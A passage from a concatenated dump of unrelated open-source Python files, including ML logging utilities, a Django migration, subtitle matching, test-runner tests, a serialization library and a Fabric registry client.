raise ValueError('Invalid shape')
samples = np.random.randn(*shape)
for i, sample in enumerate(samples):
if d2 > d1:
samples[i, ...] = np.linalg.qr(sample.T)[0].T
else:
samples[i, ...] = np.linalg.qr(sample)[0]
arr[...] = samples.reshape(arr.shape)
def randomize_normal(arr, loc=0, scale=1, random_state=None):
"""Populate an array with random numbers from a normal distribution with
mean `loc` and standard deviation `scale`.
Parameters
----------
arr : array_like
Array to work upon in place.
loc : float
Mean of the random numbers.
scale : float
Standard deviation of the random numbers.
random_state : np.random.RandomState object, optional [default : None]
Random number generator that shall generate the random numbers.
Examples
--------
>>> import numpy as np
>>> from climin.initialize import randomize_normal
>>> arr = np.empty((3, 3))
>>> randomize_normal(arr)
>>> arr # doctest: +SKIP
array([[ 0.18076413, 0.60880657, 1.20855691],
[ 1.7799948 , -0.82565481, 0.53875307],
[-0.67056028, -1.46257419, 1.17033425]])
>>> randomize_normal(arr, 10, 0.1)
>>> arr # doctest: +SKIP
array([[ 10.02221481, 10.0982449 , 10.02495358],
[ 9.99867829, 9.99410111, 9.8242318 ],
[ 9.9383779 , 9.94880091, 10.03179085]])
"""
rng = np.random if random_state is None else random_state
sample = rng.normal(loc, scale, arr.shape)
if isinstance(arr, np.ndarray):
arr[...] = sample.astype(arr.dtype)
else:
# Assume gnumpy.
arr[:] = sample.astype('float32')
|
isegm/utils/log.py | XavierCHEN34/ClickSEG | 278 | 11187274 | import io
import time
import logging
from datetime import datetime
import numpy as np
from torch.utils.tensorboard import SummaryWriter
LOGGER_NAME = 'root'
LOGGER_DATEFMT = '%Y-%m-%d %H:%M:%S'
handler = logging.StreamHandler()
logger = logging.getLogger(LOGGER_NAME)
logger.setLevel(logging.INFO)
logger.addHandler(handler)
def add_logging(logs_path, prefix):
log_name = prefix + datetime.strftime(datetime.today(), '%Y-%m-%d_%H-%M-%S') + '.log'
stdout_log_path = logs_path / log_name
fh = logging.FileHandler(str(stdout_log_path))
formatter = logging.Formatter(fmt='(%(levelname)s) %(asctime)s: %(message)s',
datefmt=LOGGER_DATEFMT)
fh.setFormatter(formatter)
logger.addHandler(fh)
class TqdmToLogger(io.StringIO):
logger = None
level = None
buf = ''
def __init__(self, logger, level=None, mininterval=5):
super(TqdmToLogger, self).__init__()
self.logger = logger
self.level = level or logging.INFO
self.mininterval = mininterval
self.last_time = 0
def write(self, buf):
self.buf = buf.strip('\r\n\t ')
def flush(self):
if len(self.buf) > 0 and time.time() - self.last_time > self.mininterval:
self.logger.log(self.level, self.buf)
self.last_time = time.time()
class SummaryWriterAvg(SummaryWriter):
def __init__(self, *args, dump_period=20, **kwargs):
super().__init__(*args, **kwargs)
self._dump_period = dump_period
self._avg_scalars = dict()
def add_scalar(self, tag, value, global_step=None, disable_avg=False):
if disable_avg or isinstance(value, (tuple, list, dict)):
super().add_scalar(tag, np.array(value), global_step=global_step)
else:
if tag not in self._avg_scalars:
self._avg_scalars[tag] = ScalarAccumulator(self._dump_period)
avg_scalar = self._avg_scalars[tag]
avg_scalar.add(value)
if avg_scalar.is_full():
super().add_scalar(tag, avg_scalar.value,
global_step=global_step)
avg_scalar.reset()
class ScalarAccumulator(object):
def __init__(self, period):
self.sum = 0
self.cnt = 0
self.period = period
def add(self, value):
self.sum += value
self.cnt += 1
@property
def value(self):
if self.cnt > 0:
return self.sum / self.cnt
else:
return 0
def reset(self):
self.cnt = 0
self.sum = 0
def is_full(self):
return self.cnt >= self.period
def __len__(self):
return self.cnt
|
common/migrations/0034_auto_20210913_1918.py | jordanm88/Django-CRM | 1,334 | 11187288 | <filename>common/migrations/0034_auto_20210913_1918.py
# Generated by Django 3.2 on 2021-09-13 13:48
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
dependencies = [
('common', '0033_alter_user_alternate_email'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='user',
),
migrations.RemoveField(
model_name='google',
name='user',
),
migrations.RemoveField(
model_name='user',
name='address',
),
migrations.RemoveField(
model_name='user',
name='alternate_phone',
),
migrations.RemoveField(
model_name='user',
name='has_marketing_access',
),
migrations.RemoveField(
model_name='user',
name='has_sales_access',
),
migrations.RemoveField(
model_name='user',
name='is_admin',
),
migrations.RemoveField(
model_name='user',
name='phone',
),
migrations.RemoveField(
model_name='user',
name='role',
),
migrations.AddField(
model_name='apisettings',
name='company',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='common.company'),
),
migrations.AddField(
model_name='comment',
name='profile',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user_comments', to='common.profile'),
),
migrations.AddField(
model_name='document',
name='company',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='common.company'),
),
migrations.AddField(
model_name='google',
name='profile',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='google', to='common.profile'),
),
migrations.AddField(
model_name='profile',
name='address',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='adress_users', to='common.address'),
),
migrations.AddField(
model_name='profile',
name='alternate_phone',
field=phonenumber_field.modelfields.PhoneNumberField(max_length=128, null=True, region=None),
),
migrations.AddField(
model_name='profile',
name='company',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='common.company'),
),
migrations.AddField(
model_name='profile',
name='date_of_joining',
field=models.DateField(blank=True, null=True),
),
migrations.AddField(
model_name='profile',
name='has_marketing_access',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='profile',
name='has_sales_access',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='profile',
name='is_active',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='profile',
name='is_organization_admin',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='profile',
name='phone',
field=phonenumber_field.modelfields.PhoneNumberField(max_length=128, null=True, region=None, unique=True),
),
migrations.AddField(
model_name='profile',
name='role',
field=models.CharField(choices=[('ADMIN', 'ADMIN'), ('USER', 'USER')], default='USER', max_length=50),
),
migrations.AlterField(
model_name='apisettings',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='settings_created_by', to='common.profile'),
),
migrations.AlterField(
model_name='apisettings',
name='lead_assigned_to',
field=models.ManyToManyField(related_name='lead_assignee_users', to='common.Profile'),
),
migrations.AlterField(
model_name='attachments',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='attachment_created_by', to='common.profile'),
),
migrations.AlterField(
model_name='comment',
name='commented_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='common.profile'),
),
migrations.AlterField(
model_name='company',
name='sub_domain',
field=models.CharField(blank=True, max_length=30, null=True),
),
migrations.AlterField(
model_name='document',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='document_uploaded', to='common.profile'),
),
migrations.AlterField(
model_name='document',
name='shared_to',
field=models.ManyToManyField(related_name='document_shared_to', to='common.Profile'),
),
migrations.AlterField(
model_name='profile',
name='activation_key',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='profile',
name='key_expires',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='profile',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterUniqueTogether(
name='profile',
unique_together={('user', 'company')},
),
]
|
python/ql/test/query-tests/Security/lib/twisted/web/resource.py | vadi2/codeql | 4,036 | 11187329 | <gh_stars>1000+
class Resource(object):
pass
|
subliminal/subtitle.py | jtwill/subliminal | 152 | 11187346 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
import os.path
import babelfish
import chardet
import guessit.matchtree
import guessit.transfo
import pysrt
from .video import Episode, Movie
logger = logging.getLogger(__name__)
class Subtitle(object):
"""Base class for subtitle
:param language: language of the subtitle
:type language: :class:`babelfish.Language`
:param bool hearing_impaired: `True` if the subtitle is hearing impaired, `False` otherwise
:param page_link: link to the web page from which the subtitle can be downloaded, if any
:type page_link: string or None
"""
def __init__(self, language, hearing_impaired=False, page_link=None):
self.language = language
self.hearing_impaired = hearing_impaired
self.page_link = page_link
#: Content as bytes
self.content = None
#: Encoding to decode with when accessing :attr:`text`
self.encoding = None
@property
def guessed_encoding(self):
"""Guessed encoding using the language, falling back on chardet"""
# always try utf-8 first
encodings = ['utf-8']
# add language-specific encodings
if self.language.alpha3 == 'zho':
encodings.extend(['gb18030', 'big5'])
elif self.language.alpha3 == 'jpn':
encodings.append('shift-jis')
elif self.language.alpha3 == 'ara':
encodings.append('windows-1256')
elif self.language.alpha3 == 'heb':
encodings.append('windows-1255')
elif self.language.alpha3 == 'tur':
encodings.extend(['iso-8859-9', 'windows-1254'])
elif self.language.alpha3 == 'pol':
# Eastern European Group 1
encodings.extend(['windows-1250'])
elif self.language.alpha3 == 'bul':
# Eastern European Group 2
encodings.extend(['windows-1251'])
else:
# Western European (windows-1252)
encodings.append('latin-1')
# try to decode
for encoding in encodings:
try:
self.content.decode(encoding)
return encoding
except UnicodeDecodeError:
pass
# fallback on chardet
logger.warning('Could not decode content with encodings %r', encodings)
return chardet.detect(self.content)['encoding']
@property
def text(self):
"""Content as string
If :attr:`encoding` is None, the encoding is guessed with :attr:`guessed_encoding`
"""
if not self.content:
return ''
return self.content.decode(self.encoding or self.guessed_encoding, errors='replace')
@property
def is_valid(self):
"""Check if a subtitle text is a valid SubRip format"""
try:
pysrt.from_string(self.text, error_handling=pysrt.ERROR_RAISE)
return True
except pysrt.Error as e:
if e.args[0] > 80:
return True
except:
logger.exception('Unexpected error when validating subtitle')
return False
def compute_matches(self, video):
"""Compute the matches of the subtitle against the `video`
:param video: the video to compute the matches against
:type video: :class:`~subliminal.video.Video`
:return: matches of the subtitle
:rtype: set
"""
raise NotImplementedError
def compute_score(self, video):
"""Compute the score of the subtitle against the `video`
There are equivalent matches so that a provider can match one element or its equivalent. This is
to give all provider a chance to have a score in the same range without hurting quality.
* Matching :class:`~subliminal.video.Video`'s `hashes` is equivalent to matching everything else
* Matching :class:`~subliminal.video.Episode`'s `season` and `episode`
is equivalent to matching :class:`~subliminal.video.Episode`'s `title`
* Matching :class:`~subliminal.video.Episode`'s `tvdb_id` is equivalent to matching
:class:`~subliminal.video.Episode`'s `series`
:param video: the video to compute the score against
:type video: :class:`~subliminal.video.Video`
:return: score of the subtitle
:rtype: int
"""
score = 0
# compute matches
initial_matches = self.compute_matches(video)
matches = initial_matches.copy()
# hash is the perfect match
if 'hash' in matches:
score = video.scores['hash']
else:
# remove equivalences
if isinstance(video, Episode):
if 'imdb_id' in matches:
matches -= {'series', 'tvdb_id', 'season', 'episode', 'title', 'year'}
if 'tvdb_id' in matches:
matches -= {'series', 'year'}
if 'title' in matches:
matches -= {'season', 'episode'}
# add other scores
score += sum((video.scores[match] for match in matches))
logger.info('Computed score %d with matches %r', score, initial_matches)
return score
def __repr__(self):
return '<%s [%s]>' % (self.__class__.__name__, self.language)
def get_subtitle_path(video_path, language=None):
"""Create the subtitle path from the given `video_path` and `language`
:param string video_path: path to the video
:param language: language of the subtitle to put in the path
:type language: :class:`babelfish.Language` or None
:return: path of the subtitle
:rtype: string
"""
subtitle_path = os.path.splitext(video_path)[0]
if language is not None:
try:
return subtitle_path + '.%s.%s' % (language.alpha2, 'srt')
except babelfish.LanguageConvertError:
return subtitle_path + '.%s.%s' % (language.alpha3, 'srt')
return subtitle_path + '.srt'
def compute_guess_matches(video, guess):
"""Compute matches between a `video` and a `guess`
:param video: the video to compute the matches on
:type video: :class:`~subliminal.video.Video`
:param guess: the guess to compute the matches on
:type guess: :class:`guessit.Guess`
:return: matches of the `guess`
:rtype: set
"""
matches = set()
if isinstance(video, Episode):
# series
if video.series and 'series' in guess and guess['series'].lower() == video.series.lower():
matches.add('series')
# season
if video.season and 'seasonNumber' in guess and guess['seasonNumber'] == video.season:
matches.add('season')
# episode
if video.episode and 'episodeNumber' in guess and guess['episodeNumber'] == video.episode:
matches.add('episode')
# year
if video.year == guess.get('year'): # count "no year" as an information
matches.add('year')
elif isinstance(video, Movie):
# year
if video.year and 'year' in guess and guess['year'] == video.year:
matches.add('year')
# title
if video.title and 'title' in guess and guess['title'].lower() == video.title.lower():
matches.add('title')
# release group
if video.release_group and 'releaseGroup' in guess and guess['releaseGroup'].lower() == video.release_group.lower():
matches.add('release_group')
# screen size
if video.resolution and 'screenSize' in guess and guess['screenSize'] == video.resolution:
matches.add('resolution')
# format
if video.format and 'format' in guess and guess['format'].lower() == video.format.lower():
matches.add('format')
# video codec
if video.video_codec and 'videoCodec' in guess and guess['videoCodec'] == video.video_codec:
matches.add('video_codec')
# audio codec
if video.audio_codec and 'audioCodec' in guess and guess['audioCodec'] == video.audio_codec:
matches.add('audio_codec')
return matches
def compute_guess_properties_matches(video, string, propertytype):
"""Compute matches between a `video` and properties of a certain property type
:param video: the video to compute the matches on
:type video: :class:`~subliminal.video.Video`
:param string string: the string to check for a certain property type
:param string propertytype: the type of property to check (as defined in guessit)
:return: matches of a certain property type (but will only be 1 match because we are checking for 1 property type)
:rtype: set
Supported property types: result of guessit.transfo.guess_properties.GuessProperties().supported_properties()
[u'audioProfile',
u'videoCodec',
u'container',
u'format',
u'episodeFormat',
u'videoApi',
u'screenSize',
u'videoProfile',
u'audioChannels',
u'other',
u'audioCodec']
"""
matches = set()
# We only check for the property types relevant for us
if propertytype == 'screenSize' and video.resolution:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.resolution.lower():
matches.add('resolution')
elif propertytype == 'format' and video.format:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.format.lower():
matches.add('format')
elif propertytype == 'videoCodec' and video.video_codec:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.video_codec.lower():
matches.add('video_codec')
elif propertytype == 'audioCodec' and video.audio_codec:
for prop in guess_properties(string, propertytype):
if prop.lower() == video.audio_codec.lower():
matches.add('audio_codec')
return matches
def guess_properties(string, propertytype):
properties = set()
if string:
tree = guessit.matchtree.MatchTree(string)
guessit.transfo.guess_properties.GuessProperties().process(tree)
properties = set(n.guess[propertytype] for n in tree.nodes() if propertytype in n.guess)
return properties
def fix_line_endings(content):
"""Fix line ending of `content` by changing it to \n
:param bytes content: content of the subtitle
:return: the content with fixed line endings
:rtype: bytes
"""
return content.replace(b'\r\n', b'\n').replace(b'\r', b'\n')
|
koalixcrm/djangoUserExtension/user_extension/text_paragraph.py | Cataldir/koalixcrm | 290 | 11187380 | # -*- coding: utf-8 -*-
from django.db import models
from django.contrib import admin
from django.utils.translation import ugettext as _
from koalixcrm.crm.const.purpose import *
class TextParagraphInDocumentTemplate(models.Model):
document_template = models.ForeignKey("djangoUserExtension.DocumentTemplate")
purpose = models.CharField(verbose_name=_("Purpose"), max_length=2, choices=PURPOSESTEXTPARAGRAPHINDOCUMENTS)
text_paragraph = models.TextField(verbose_name=_("Text"), blank=False, null=False)
class Meta:
app_label = "crm"
verbose_name = _('TextParagraphInDocumentTemplate')
verbose_name_plural = _('TextParagraphInDocumentTemplates')
def __str__(self):
return str(self.id)
class InlineTextParagraph(admin.TabularInline):
model = TextParagraphInDocumentTemplate
extra = 1
classes = ('collapse-open',)
fieldsets = (
(_('Basics'), {
'fields': ('purpose', 'text_paragraph',)
}),
)
allow_add = True |
astropy/tests/tests/test_runner.py | jayvdb/astropy | 445 | 11187383 | <filename>astropy/tests/tests/test_runner.py<gh_stars>100-1000
import pytest
# Renamed these imports so that them being in the namespace will not
# cause pytest 3 to discover them as tests and then complain that
# they have __init__ defined.
from astropy.tests.runner import TestRunner as _TestRunner
from astropy.tests.runner import TestRunnerBase as _TestRunnerBase
from astropy.tests.runner import keyword
def test_disable_kwarg():
class no_remote_data(_TestRunner):
@keyword()
def remote_data(self, remote_data, kwargs):
return NotImplemented
r = no_remote_data('.')
with pytest.raises(TypeError):
r.run_tests(remote_data='bob')
def test_wrong_kwarg():
r = _TestRunner('.')
with pytest.raises(TypeError):
r.run_tests(spam='eggs')
def test_invalid_kwarg():
class bad_return(_TestRunnerBase):
@keyword()
def remote_data(self, remote_data, kwargs):
return 'bob'
r = bad_return('.')
with pytest.raises(TypeError):
r.run_tests(remote_data='bob')
def test_new_kwarg():
class Spam(_TestRunnerBase):
@keyword()
def spam(self, spam, kwargs):
return [spam]
r = Spam('.')
args = r._generate_args(spam='spam')
assert ['spam'] == args
def test_priority():
class Spam(_TestRunnerBase):
@keyword()
def spam(self, spam, kwargs):
return [spam]
@keyword(priority=1)
def eggs(self, eggs, kwargs):
return [eggs]
r = Spam('.')
args = r._generate_args(spam='spam', eggs='eggs')
assert ['eggs', 'spam'] == args
def test_docs():
class Spam(_TestRunnerBase):
@keyword()
def spam(self, spam, kwargs):
"""
Spam Spam Spam
"""
return [spam]
@keyword()
def eggs(self, eggs, kwargs):
"""
eggs asldjasljd
"""
return [eggs]
r = Spam('.')
assert "eggs" in r.run_tests.__doc__
assert "Spam Spam Spam" in r.run_tests.__doc__
|
corehq/tabs/extension_points.py | dimagilg/commcare-hq | 471 | 11187411 | from typing import List, Tuple
from corehq.extensions import extension_point, ResultFormat
@extension_point(result_format=ResultFormat.FLATTEN)
def uitab_dropdown_items(tab_name, tab, domain, request) -> List[dict]:
"""Add dropdown items to UI Tabs.
Parameters:
:param tab_name: Name of the tab that items will be added to
:param tab: The tab instance
:param domain: The domain of the current request
:param request: The current request
Returns:
A dict with the following keys:
* title
* url (default=None)
* html (default=None)
* is_header (default=False)
* is_divider (default=False)
* data_id (default=None)
"""
@extension_point(result_format=ResultFormat.FLATTEN)
def uitab_sidebar_items(tab_name, tab, domain, request) -> List[Tuple[str, List[dict]]]:
"""Add sidebar items to UI tabs.
Parameters:
:param tab_name: Name of the UI Tab
:param tab: The tab instance
:param domain: The domain name
:param request: The request object
Returns:
A list of tuples: Tuple[header_text, List[dict]]. The dictionaries must have
the following keys:
* title: Link text
* url: relative URL for the UI
* icon: Link icon
* show_in_dropdown (optional): boolean
"""
@extension_point(result_format=ResultFormat.FLATTEN)
def uitab_classes():
"""Add custom tabs to the top navigation
Parameters:
None
Returns:
List of UITab subclasses
"""
|
norminette/lexer/__init__.py | kohkubo/norminette | 460 | 11187430 | from norminette.lexer.lexer import Lexer
from norminette.lexer.lexer import TokenError
from norminette.lexer.tokens import Token
__all__ = ["Lexer", "TokenError", "Token"]
|
convert_labels.py | QzAnsel/Person-Segmentation-Keras | 155 | 11187461 | <reponame>QzAnsel/Person-Segmentation-Keras<gh_stars>100-1000
import os
import cv2
from tqdm import tqdm
import argparse
parse = argparse.ArgumentParser()
parse.add_argument('--img-path', type=str, default='')
parse.add_argument('--save-path', type=str, default='')
parse.add_argument('--mode', type=str, default='segmentation')
args = parse.parse_args()
data_path = args.img_path
save_path = args.save_path
limgs = os.listdir(data_path)
pd = tqdm(total=17706)
if args.mode == 'segmentation':
for item in limgs:
pd.update(1)
im = cv2.imread(data_path + item)
im[im != 0] = 1
cv2.imwrite(save_path + item, im)
else:
for item in limgs:
pd.update(1)
im = cv2.imread(data_path + item)
im[im == 1] = 1
im[im == 2] = 1
im[im == 3] = 1
im[im == 17] = 1
im[im == 11] = 1
im[im == 4] = 2
im[im == 14] = 3
im[im == 15] = 3
im[im == 5] = 4
im[im == 6] = 4
im[im == 7] = 4
im[im == 8] = 4
im[im == 9] = 4
im[im == 10] = 4
im[im == 12] = 4
im[im == 13] = 4
im[im == 16] = 0
cv2.imwrite(save_path + item, im)
pd.close()
|
tests/utils.py | projectoriented/tools | 142 | 11187464 | <filename>tests/utils.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Helper functions for tests
"""
import functools
import tempfile
def with_temporary_folder(func):
"""
Call the decorated funtion under the tempfile.TemporaryDirectory
context manager. Pass the temporary directory name to the decorated
function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with tempfile.TemporaryDirectory() as tmpdirname:
return func(*args, tmpdirname, **kwargs)
return wrapper
def with_temporary_file(func):
"""
Call the decorated funtion under the tempfile.NamedTemporaryFile
context manager. Pass the opened file handle to the decorated function
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
with tempfile.NamedTemporaryFile() as tmpfile:
return func(*args, tmpfile, **kwargs)
return wrapper
|
examples/bench/django/templatetags/bench.py | LordAro/mako | 207 | 11187496 | <reponame>LordAro/mako<gh_stars>100-1000
from django.template import Library, Node, resolve_variable
from django.utils.html import escape
register = Library()
def greeting(name):
return "Hello, %s!" % escape(name)
greeting = register.simple_tag(greeting)
|
tests/canary/agent/canary.py | 02strich/aws-embedded-metrics-python | 130 | 11187502 | <reponame>02strich/aws-embedded-metrics-python
import asyncio
import aws_embedded_metrics
from aws_embedded_metrics import metric_scope
from aws_embedded_metrics.config import get_config
from getversion import get_module_version
import os
import psutil
import time
import logging
log = logging.getLogger(__name__)
version, _ = get_module_version(aws_embedded_metrics)
Config = get_config()
Config.log_group_name = '/Canary/Python/CloudWatchAgent/Metrics'
process = psutil.Process(os.getpid())
@metric_scope
async def app(init, last_run_duration, metrics):
if init:
metrics.put_metric('Init', 1, 'Count')
init = False
metrics.set_namespace('Canary')
metrics.set_dimensions({"Runtime": 'Python', "Platform": 'ECS', "Agent": 'CloudWatchAgent', "Version": version})
metrics.put_metric('Invoke', 1, "Count")
metrics.put_metric('Duration', last_run_duration, 'Seconds')
metrics.put_metric('Memory.RSS', process.memory_info().rss, 'Bytes')
async def main():
init = True
duration = None
# wait for agent to start
# TODO: this should not be needed if we're using a ring buffer to queue and re-try events
await asyncio.sleep(10)
while True:
# capture the approximate run time of the method
last_run_at = time.time_ns()
await app(init, duration)
duration = time.time_ns() - last_run_at
await asyncio.sleep(0.2)
init = False
asyncio.run(main())
|
src/related/functions.py | RodrigoDeRosa/related | 190 | 11187526 | from __future__ import absolute_import, division, print_function
from collections import OrderedDict
from enum import Enum
import yaml
import json
from attr._make import fields
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
@singledispatch
def to_dict(obj, **kwargs):
"""
Convert an object into dictionary. Uses singledispatch to allow for
clean extensions for custom class types.
Reference: https://pypi.python.org/pypi/singledispatch
:param obj: object instance
:param kwargs: keyword arguments such as suppress_private_attr,
suppress_empty_values, dict_factory
:return: converted dictionary.
"""
# if is_related, then iterate attrs.
if is_model(obj.__class__):
return related_obj_to_dict(obj, **kwargs)
# else, return obj directly. register a custom to_dict if you need to!
# reference: https://pypi.python.org/pypi/singledispatch
else:
return obj
def related_obj_to_dict(obj, **kwargs):
""" Covert a known related object to a dictionary. """
# Explicitly discard formatter kwarg, should not be cascaded down.
kwargs.pop('formatter', None)
# If True, remove fields that start with an underscore (e.g. _secret)
suppress_private_attr = kwargs.get("suppress_private_attr", False)
# if True, don't store fields with None values into dictionary.
suppress_empty_values = kwargs.get("suppress_empty_values", False)
# get list of attrs fields
attrs = fields(obj.__class__)
# instantiate return dict, use OrderedDict type by default
return_dict = kwargs.get("dict_factory", OrderedDict)()
for a in attrs:
# skip if private attr and flag tells you to skip
if suppress_private_attr and a.name.startswith("_"):
continue
metadata = a.metadata or {}
# formatter is a related-specific `attrs` meta field
# see fields.DateField
formatter = metadata.get('formatter')
# get value and call to_dict on it, passing the kwargs/formatter
value = getattr(obj, a.name)
value = to_dict(value, formatter=formatter, **kwargs)
# check flag, skip None values
if suppress_empty_values and value is None:
continue
# field name can be overridden by the metadata field
key_name = a.metadata.get('key') or a.name
# store converted / formatted value into return dictionary
return_dict[key_name] = value
return return_dict
def to_model(cls, value):
"""
Coerce a value into a model object based on a class-type (cls).
:param cls: class type to coerce into
:param value: value to be coerced
:return: original value or coerced value (value')
"""
if isinstance(value, cls) or value is None:
pass # skip if right type or value is None
elif issubclass(cls, Enum):
value = cls(value)
elif is_model(cls) and isinstance(value, dict):
value = convert_key_to_attr_names(cls, value)
value = cls(**value)
else:
value = cls(value)
return value
def convert_key_to_attr_names(cls, original):
""" convert key names to their corresponding attribute names """
attrs = fields(cls)
updated = {}
keys_pulled = set()
for a in attrs:
key_name = a.metadata.get('key') or a.name
if key_name in original:
updated[a.name] = original.get(key_name)
keys_pulled.add(key_name)
if getattr(cls, '__related_strict__', False):
extra = set(original.keys()) - keys_pulled
if len(extra):
raise ValueError("Extra keys (strict mode): {}".format(extra))
return updated
def is_model(cls):
"""
Check whether *cls* is a class with ``attrs`` attributes.
:param type cls: Class to introspect.
:raise TypeError: If *cls* is not a class.
:rtype: :class:`bool`
"""
return getattr(cls, "__attrs_attrs__", None) is not None
def to_yaml(obj, stream=None, dumper_cls=yaml.Dumper, default_flow_style=False,
**kwargs):
"""
Serialize a Python object into a YAML stream with OrderedDict and
default_flow_style defaulted to False.
If stream is None, return the produced string instead.
OrderedDict reference: http://stackoverflow.com/a/21912744
default_flow_style reference: http://stackoverflow.com/a/18210750
:param data: python object to be serialized
:param stream: to be serialized to
:param Dumper: base Dumper class to extend.
:param kwargs: arguments to pass to to_dict
:return: stream if provided, string if stream is None
"""
class OrderedDumper(dumper_cls):
pass
def dict_representer(dumper, data):
return dumper.represent_mapping(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
data.items())
OrderedDumper.add_representer(OrderedDict, dict_representer)
obj_dict = to_dict(obj, **kwargs)
return yaml.dump(obj_dict, stream, OrderedDumper,
default_flow_style=default_flow_style)
def from_yaml(stream, cls=None, loader_cls=yaml.Loader,
object_pairs_hook=OrderedDict, **extras):
"""
Convert a YAML stream into a class via the OrderedLoader class.
"""
class OrderedLoader(loader_cls):
pass
def construct_mapping(loader, node):
loader.flatten_mapping(node)
return object_pairs_hook(loader.construct_pairs(node))
OrderedLoader.add_constructor(
yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,
construct_mapping)
yaml_dict = yaml.load(stream, OrderedLoader) or {}
yaml_dict.update(extras)
return cls(**yaml_dict) if cls else yaml_dict
def to_json(obj, indent=4, sort_keys=True, **kwargs):
"""
:param obj: object to convert to dictionary and then output to json
:param indent: indent json by number of spaces
:param sort_keys: sort json output by key if true
:param kwargs: arguments to pass to to_dict
:return: json string
"""
obj_dict = to_dict(obj, **kwargs)
return json.dumps(obj_dict, indent=indent, sort_keys=sort_keys)
def from_json(stream, cls=None, object_pairs_hook=OrderedDict, **extras):
"""
Convert a JSON string or stream into specified class.
"""
stream = stream.read() if hasattr(stream, 'read') else stream
json_dict = json.loads(stream, object_pairs_hook=object_pairs_hook)
if extras:
json_dict.update(extras) # pragma: no cover
return to_model(cls, json_dict) if cls else json_dict
|
vaas-app/src/vaas/purger/urls.py | allegro/vaas | 251 | 11187542 | # -*- coding: utf-8 -*-
from django.conf.urls import url
from vaas.purger.views import purge_view
urlpatterns = [
url(r'^$', purge_view, name='purge_view'),
]
|
sdk/avalon_sdk/connector/blockchains/fabric/fabric_worker_registry_list.py | ikegawa-koshi/avalon | 127 | 11187580 | # Copyright 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from utility.hex_utils import is_valid_hex_str
import binascii
from os import environ
from utility.hex_utils import byte_array_to_hex_str
from avalon_sdk.connector.interfaces.worker_registry_list \
import WorkerRegistryList
from avalon_sdk.registry.registry_status import RegistryStatus
from avalon_sdk.connector.blockchains.fabric.fabric_wrapper \
import FabricWrapper
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(message)s", level=logging.INFO)
class FabricWorkerRegistryListImpl(WorkerRegistryList):
"""
This class provide APIs to read/write registry entries of workers,
which is stored in the Hyperledger Fabric blockchain.
"""
def __init__(self, config):
"""
Parameters:
config Dictionary containing Fabric-specific parameters.
"""
self.__fabric_wrapper = None
# Chain code name
self.CHAIN_CODE = 'registry'
if config is not None:
self.__fabric_wrapper = FabricWrapper(config)
else:
raise Exception("config is none")
def registry_lookup(self, app_type_id=None):
"""
Registry Lookup identified by application type ID
Parameters:
app_type_id Application type ID to lookup in the registry
Returns:
Tuple containing totalCount, lookupTag, and ids on success:
totalCount Total number of entries matching a specified lookup
criteria. If this number is larger than the size of the
ids array, the caller should use the lookupTag to call
registry_lookup_next to retrieve the rest of the IDs
lookupTag Optional parameter. If it is returned, it means that
there are more matching registry IDs that can be
retrieved by calling the function registry_lookup_next
with this tag as an input parameter.
ids Array of the registry organization ids that match the
input parameters.
Returns None on error.
"""
if (self.__fabric_wrapper is not None):
if app_type_id is not None:
if is_valid_hex_str(binascii.hexlify(app_type_id).decode(
"utf8")):
params = []
params.append(byte_array_to_hex_str(app_type_id))
lookupResult = \
self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryLookUp',
params)
else:
logging.info(
"Invalid application type id {}".format(app_type_id))
return None
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_retrieve(self, org_id):
"""
Retrieve registry information identified by the organization ID.
Parameters:
org_id Organization ID to lookup
Returns:
Tuple containing following on success:
uri String defines a URI for this registry that
supports the Off-Chain Worker Registry JSON RPC
API. It will be None for the proxy model
sc_addr Fabric address for worker registry
smart contract address
application_type_ids List of application ids (array of byte[])
status Status of the registry
Returns None on error.
"""
if (self.__fabric_wrapper is not None):
